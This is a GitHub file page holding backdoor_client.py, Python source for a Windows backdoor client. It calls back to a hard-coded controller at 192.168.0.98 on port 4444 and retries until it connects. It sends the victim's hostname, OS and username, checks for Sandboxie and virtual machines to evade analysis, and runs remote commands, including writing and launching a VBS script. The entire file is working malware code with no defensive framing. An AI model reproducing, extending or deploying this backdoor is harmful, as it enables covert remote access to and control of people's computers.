-
Notifications
You must be signed in to change notification settings - Fork 0
/
backdoor_client.py
111 lines (75 loc) · 2.28 KB
/
backdoor_client.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# need install python packages before running code
# python -m pip install pywin32 pyscreeze
import socket
import os
import sys
import platform
import time
import ctypes
import subprocess
import threading
import wmi
import win32api
import winerror
import win32event
import win32crypt
from winreg import *
strHost = "192.168.0.98"
intPort = 4444
strPath = os.path.realpath(sys.argv[0])
TMP = os.environ['APPDATA']
intBuff = 1024
#only one single thread - prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
sys.exit(0)
def detectSandboxie():
try:
libHandle = ctypes.windll.LoadLibrary("SbieDll.dll")
return " (Sandboxie) "
except:
return ""
def detectVM():
objWMI = wmi.WMI()
for objDiskDrive in objWMI.query("Select * from Win32_DiskDrive"):
if "vbox" in objDiskDrive.Caption.lower() or "virtual" in objDiskDrive.Caption.lower():
return " (Virtual Machine) "
return ""
def server_connect():
global obj_socket
while True:
try:
obj_socket = socket.socket()
obj_socket.connect((strHost, intPort))
except socket.error:
time.sleep(5) # after 5 second will try again
else:
break
str_user_info = socket.gethostname() + "'," + platform.system() + " " + \
platform.release() + detectSandboxie() + detectVM() + \
"', " + os.environ["USERNAME"]
send(str.encode(str_user_info))
def decode_utf8(data): return data.decode("utf-8")
def recv(buffer): return obj_socket.recv(buffer)
def send(data): return obj_socket.send(data)
server_connect()
def messageBox(msg):
objVBS = open(TMP + "/m.vbs", "w")
objVBS.write("MsgBox " + msg + " Message")
objVBS.close()
subprocess.Popen(["csript", TMP + "/m.vbs"], shell=True)
while True:
try:
while True:
str_data = recv(intBuff)
str_data = decode_utf8(str_data)
if str_data == "exit":
obj_socket.close()
sys.exit(0)
elif str_data[:3] == "msg":
messageBox(str_data[4:])
except socket.error:
obj_socket.close()
del obj_socket
server_connect()